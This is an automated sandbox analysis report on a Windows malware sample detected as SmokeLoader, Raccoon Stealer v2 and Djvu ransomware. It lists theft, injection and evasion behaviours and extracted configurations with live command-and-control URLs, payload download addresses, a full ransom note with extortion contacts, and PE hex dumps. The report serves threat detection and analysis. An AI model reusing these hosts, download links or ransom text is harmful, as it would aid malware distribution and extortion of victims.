Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 715161
MD5: 417429fd2a6efc7f87c32696c8545146
SHA1: 04624a0080341cc2409f76bd1f5d9def049f46a9
SHA256: d15624abf29ec8f68092007b8359b03182e3a82b0d8b8c3cd72f1d765e8ca1bb
Tags: exe
Infos:

Detection

CryptOne, Djvu, Raccoon Stealer v2, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected CryptOne packer
Yara detected SmokeLoader
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Injects a PE file into a foreign processes
DLL side loading technique detected
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE file contains more sections than normal
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system

Classification

AV Detection

barindex
Source: furubujjul.net Virustotal: Detection: 6% Perma Link
Source: C:\Users\user\AppData\Local\Temp\FED8.dll ReversingLabs: Detection: 30%
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\959.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sfrvjvv Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\253.exe Joe Sandbox ML: detected
Source: 15.3.959.exe.800000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.regsvr32.exe.5090184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 0000000F.00000002.427521225.000000000076E000.00000004.00000010.00020000.00000000.sdmp Malware Configuration Extractor: Raccoon {"C2 url": ["http://193.38.55.180/"], "Bot ID": "1a17d9aed7a239440deb75d7a177f406", "RC4_key1": "1a17d9aed7a239440deb75d7a177f406"}
Source: 0000000B.00000002.472600397.0000000000640000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://hulimudulinu.net/", "http://stalnnuytyt.org/", "http://gulutina49org.org/", "http://furubujjul.net/", "http://starvestitibo.org/", "http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
Source: 18.2.253.exe.400000.0.unpack Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-g28rVcqA58\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0573Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 253.exe, 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 253.exe, 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: softokn3.pdbp source: softokn3.dll.20.dr
Source: Binary string: C:\rufud-fuza.pdb source: 253.exe, 0000000E.00000000.365710551.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 0000000E.00000002.441234028.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 00000012.00000000.379623038.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: '-&C:\liv98\mid-hiza.pdb source: file.exe
Source: Binary string: C:\liv98\mid-hiza.pdb source: file.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 253.exe, 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 253.exe, 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: nss3.dll.20.dr
Source: Binary string: &#R/C:\rufud-fuza.pdb source: 253.exe, 0000000E.00000000.365710551.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 0000000E.00000002.441234028.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 00000012.00000000.379623038.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: softokn3.pdb source: softokn3.dll.20.dr
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00404C5C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 13_2_00404C5C

Networking

barindex
Source: Traffic Snort IDS: 2038916 ET TROJAN Win32/RecordBreaker - Observed UA M3 (TakeMyPainBack) 192.168.2.7:49703 -> 193.38.55.180:80
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49703 -> 193.38.55.180:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 193.38.55.180:80 -> 192.168.2.7:49703
Source: Malware configuration extractor URLs: http://winnlinne.com/lancer/get.php
Source: Malware configuration extractor URLs: http://193.38.55.180/
Source: Malware configuration extractor URLs: http://hulimudulinu.net/
Source: Malware configuration extractor URLs: http://stalnnuytyt.org/
Source: Malware configuration extractor URLs: http://gulutina49org.org/
Source: Malware configuration extractor URLs: http://furubujjul.net/
Source: Malware configuration extractor URLs: http://starvestitibo.org/
Source: Malware configuration extractor URLs: http://liubertiyyyul.net/
Source: Malware configuration extractor URLs: http://bururutu44org.org/
Source: Malware configuration extractor URLs: http://youyouumenia5.org/
Source: Malware configuration extractor URLs: http://nvulukuluir.net/
Source: Malware configuration extractor URLs: http://nuluitnulo.me/
Source: Malware configuration extractor URLs: http://guluiiiimnstra.net/
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:23 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:25 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:26 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:28 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
